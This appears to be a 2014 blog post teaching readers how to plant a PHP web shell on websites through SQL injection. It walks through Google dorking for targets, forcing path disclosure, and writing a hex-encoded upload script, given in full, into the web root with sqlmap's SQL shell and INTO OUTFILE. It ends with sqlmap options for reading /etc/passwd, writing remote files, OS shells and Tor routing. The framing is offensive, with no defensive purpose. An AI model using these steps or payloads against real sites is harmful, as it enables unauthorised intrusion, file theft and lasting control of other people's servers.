Mar 15, 2014

SQL map tricks ... Uploading a shell with SQL injection.

Uploading a shell with SQL injection. 
what you need:?
A php shell of your choosing 
A php upload script http://www.w3schools.com/php/php_file_upload.asp 
SQLmap sqlmap.org

What is a shell you ask? 
"Shell is a shell wrapped in a script. It's a tool you can use to execute
arbitrary shell-commands or browse the filesystem on your remote 
webserver. This replaces, to a degree, a normal telnet connection, and 
to a lesser degree a SSH connection.

You use it for 
administration and maintenance of your website, which is often much 
easier to do if you can work directly on the server. For example, you 
could use PHP Shell to unpack and move big files around. All the normal 
command line programs like ps, free, du, df, etc can be used.

There
are some limitations on what kind of programs you can run. It won't do 
no good if you start a graphical program like Firefox or even a console 
based one like vi. All programs have to be strictly command line 
programs, and they will have no chance of getting user input after they 
have been launched.They probably also have to terminate within 30 
seconds, as this is the default time-limit imposed unto all PHP scripts,
to prevent them from running in an infinite loop. Your ISP may have set
this time-limit to something else.

But you can rely on all the normal shell-functionality, like pipes, output and input redirection, etc"

1. After finding a site either by google dorking or other means you need to get full path disclosure. https://www.owasp.org/index.php/Full_Path_Disclosure
I will use the empty array exploit, add the brackets []
Code:
http://www.example.com/index.php?id[]=1
That should give you. 
Code:
Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59

2. You`ll need to convert you script to hex you can do so here http://www.string-functions.com/string-hex.aspx

So you`ll have something like this...
Code:

Turn into this.
Code:
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d64617461222061637469​6f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d​653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970​653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d​0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b277570​6c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66​696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c​247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b277570​6c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f616465​64223b7d656c73657b6563686f20224572726f7221223b7d3f3e

3. Now lets fire up sqlmap with a sql-shell and inject.
Code:
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell

Let SQLmap do its magic and after a while you will get a SQL-shell.

Code:
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>

Now write,
SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";
Don't forget the 0x before your hex, so it should look like.

Code:
select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374​696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e61​6d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e707574207479​70653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e​0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775​706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f​66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d​2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775​706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f6164​6564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";

After a few secs is should tell you if it worked or not. 

4.Then browse to http://www.example.com/upload.php and upload the php shell.


5.Browse to your php shell by pathing and login. ALWAYS USE A PASSWORD ON YOUR SHELL.

Extra:
You don't need to use sqlmap you can simply run the select statement in your browser it requires a bit more work tho.

A
theory is that you can inject the full shellcode directly instead of 
first writing the uploader, the problems is that this specific shell is 
268kB but maybe with a smaller shell

sqlmap is really powerful tool you can do shitt load of stuff with it here are some functions i find helpfull:

-o optimization
--threads=1-10 nr of threads (faster)
--dbms=mysql backend dbms (faster)
--level=1-5 more-tests
--risk=1-3 more-tests
--tor-port=xxxx connect through tor
--random-agent random user agent
--file-read=/etc/passwd read local file
--file-write=/etc/passwd write file to remote machine must be used with file-dest
--file-dest=/etc/passwd where to write the file-write
--os-shell like the sql-shell but system
--wizard for beginners 
--check-waf Check for WAF/IPS/IDS protection

there are many more just check them out

The
--file-read/write does not work most of the times maybe im doing 
something wrong thats why i use sql-shell to write files or do specific 
commands.

--os-shell is awesome, you cant write php code to disk tho.

Hope you guys enjoyed.

No comments:

Post a Comment